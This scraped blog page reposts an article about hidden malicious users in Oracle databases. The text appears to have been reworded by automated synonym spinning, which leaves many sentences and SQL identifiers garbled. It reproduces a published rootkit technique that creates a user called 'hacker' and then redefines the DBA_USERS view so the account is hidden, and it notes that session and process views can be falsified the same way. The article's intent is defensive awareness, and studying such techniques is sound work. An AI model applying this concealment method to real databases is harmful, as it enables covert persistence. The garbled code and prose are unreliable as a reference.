Your browser does not support our blog javascript

outer join oracle

search for more blogs here

 
Home - Take this blog! - Get your Author's Pass Here - Submit Comments Below

Hackers in your Database

Posted by ~Ray @ 2007-11-03 14:04:54


Steve Callan stevencallan@hotmail comTinker. accommodate. pass. Spy comes to mind when the subject of database security comes up. How would you know if there was a mole in your database? A mole in this context refers to a malicious user who has hacked Oracle objects to adjoin his tracks and much like the mole in John le Carre’s novel stays hidden from view while causing alter to the system (or other users). Is there a George Smiley we could label upon to grow out the mole? A trusting user of Oracle. DBA or otherwise probably shouldn’t be so well trusting. Without extensive checking or safeguards you really don’t know how secure or locked drink user find is. How easy is it to mock the normal checks of an account’s privileges? The say is that it is a lot easier than you think. An excellent example of creating and then hiding a user was given in a presentation titled “Oracle Rootkits 2.0” at a Black Hat training conference by Alexander Kornbrust of Red Database Security Gmbh. The essential part of making this come about is summarized in the label below. SQL> conn sys/oracle as sysdbaConnected. SQL> create user hacker identified by hacker;User created. SQL> select username from dba_users where username = 'HACKER';USERNAME---------HACKERSQL> @cr_user_viewView created. SQL> select username from dba_users where username = 'HACKER';no rows selected The “magic” of this stems from the fact that dba_users is a view and one of the underlying tables is sys user$. The “cr_user_view” SQL script is nothing more than the script or obtain code for the dba_users believe (see below) to consider an extra instruct: where name CREATE OR REPLACE VIEW DBA_USERS(USERNAME. USER_ID. PASSWORD. ACCOUNT_STATUS. fasten_DATE. EXPIRY_DATE. DEFAULT_TABLESPACE. TEMPORARY_TABLESPACE. CREATED. PROFILE,INITIAL_RSRC_CONSUMER_GROUP. EXTERNAL_label)ASselect u name u user# u password m status rewrite(u astatus. 4 u ltime. 5 u ltime. 6 u ltime. 8 u ltime,9 u ltime. 10 u ltime to_date(NULL)) rewrite(u astatus. 1 u exptime. 2 u exptime. 5 u exptime. 6 u exptime. 9 u exptime. 10 u exptime decode(u ptime. '' to_date(NULL) decode(pr limit#. 2147483647 to_go out(NULL) rewrite(pr limit#. 0 decode(dp limit#. 2147483647 to_date(NULL) u ptime + dp limit#/86400) u ptime + pr limit#/86400)))) dts name tts label u ctime p label nvl(cgm consumer_group. 'fail_CONSUMER_assort') u ext_username from sys user$ u left outer join sys resource_group_mapping$ cgm on (cgm attribute = 'ORACLE_USER' and cgm status = 'ACTIVE' and cgm determine = u name) sys ts$ dts sys ts$ tts sys profname$ p sys user_astatus_map m sys profile$ pr sys compose$ dp where u datats# = dts ts# and u resource$ = p compose# and u tempts# = tts ts# and u astatus = m status# and u type# = 1 and u resource$ = pr profile# and dp profile# = 0 and dp write#=1 and dp resource#=1 and pr type# = 1 and pr resource# = 1 and u name Of cover the username of HACKER is in the user$ table but who looks in the “real” tables when virtually the entire public facing data dictionary avoids the real tables? It shouldn’t be any great affect that if someone goes to the effort (or has the ability and wherewithal) to enclose such a user account from commonly used views that the user will certainly undergo included a “give dba to hacker” statement as well. Kronbrust also points out areas/views where a hacker would also be to adjoin his tracks with consider to processes and jobs. Four data dictionary objects that would be dummied up so to speak are v$session gv_$session flow_sessions and v_$process. How would (or could) you prevent a hacker or mole from entering in the first displace? move of the answer lies in limiting find to the SYS schema and auditing logons as SYS. This approach reminds me of guard shows where Internal Affairs Division (IAD) investigators investigate the rank and file police compel when allegations of wrongdoing are filed. Who investigates IAD investigators when they are suspected of wrongdoing? Other IAD investigators? So bunco of some higher/final authority there needs to be a level of believe among users with access to SYS (either via logon as SYS or connecting as sysdba via an operating system account). “believe but affirm” is probably a good command to implement. Another part of the answer concerns protecting or safeguarding be label and objects. How would you even mouth to know or guess if someone altered a data dictionary view? In all likelihood you wouldn’t know until after something bad happened. It’s hard enough in a development environment to maintain obtain and version control over known objects and label so it is not difficult to conceive of how the situation is made more cumbersome when a malicious element is involved. There are many motives for a mole. In 2002 an employee of a racetrack betting software application made news when he “accessed a company computer after four races were complete.[ADVERTHERE]Related article:
http://askanantha.blogspot.com/2007/09/hackers-in-your-database.html

0 Comments:


No comments have been posted yet!

From:   Website:
Subject:   Code:
Message:


   

 


 

 

 





blogs - aa blogs - air force blogs - aquarius blogs - aries blogs - army blogs - arts blogs - baby blogs - blogs 4 men - blogs 4 women - cancer blogs - capricorn blogs - career change blogs - choice blogs - christmas blogs - cigar blogs - cigarette blogs - cig blogs - coast guard blogs - coffee bean blogs - college baseball blogs - college basketball blogs - college football blogs - colleges blogs - computer blogs - create blogs - dating blogs - elvis blogs - email chat blogs - email pal blogs - enhancement blogs - fall blogs - fha blogs - freedom blogs - friendly blogs - funny blogs - gambler blogs - gemini blogs - her blog - his blog - hockey blogs - join blogs - javas blogs - kid safe blogs - leo blogs - libra blogs - apartments blogs - coffees blogs - horoscopes blogs - life advice blogs - lover blogs - marine blogs - married blogs - military blogs - misc blogs - more money blogs - mortgage blogs - move blogs - movies blogs - musical blogs - navy blogs - new in town blogs - obscure blogs - online date blogs - online game blogs - over 30 blogs - over 40 blogs - over 50 blogs - over 60 blogs - over 70 blogs - over 80 blogs - over 90 blogs - password blogs - pc blogs - mortgages blogs - peoples blogs - pictures blogs - pipe blogs - pisces blogs - poems blogs - poker blogs - police blogs - political blogs radio blogs - read blogs - recreational vehicle blogs - relocation blogs - reserve blogs - rv blogs - safe blogs - scorpio blogs - singles blogs - smokers blogs - smoker blogs - state blogs - state college blogs - taurus blogs - teen advice blogs - teenager blogs - tobacco blogs - tv blogs - vacation blogs - veteran blogs - virgo blogs - virtual blogs - weekly blogs - wingman blogs - word blogs - words blogs - writer blogs - poetry blogs - prescription blogs - sagittarius blogs - straight blogs - summer blogs - gi blogs - hooka blogs - penis enlargement blogs - vfw blogs - casinos blogs - casino blogs - web hosting blogs - hosting blogs - auto blogs - truck blogs - van blogs - suv blogs - 4 wheel blogs - harley blogs - flu blogs - diet blogs - pistols blogs - teenage blogs - lpga blogs - burnable blogs - new tunes blogs - coaching blogs - treasures blogs - trades blogs - nutty blogs - skate blogs - play 21 blogs - weather blogs - poker players - golf blogs - american blogs - football blogs - baseball blogs - hockey blogs - basketball blogs - soccer blogs - cooking blogs - recipe blogs - space blogs - 3d games blogs - barbecue blogs




blogs home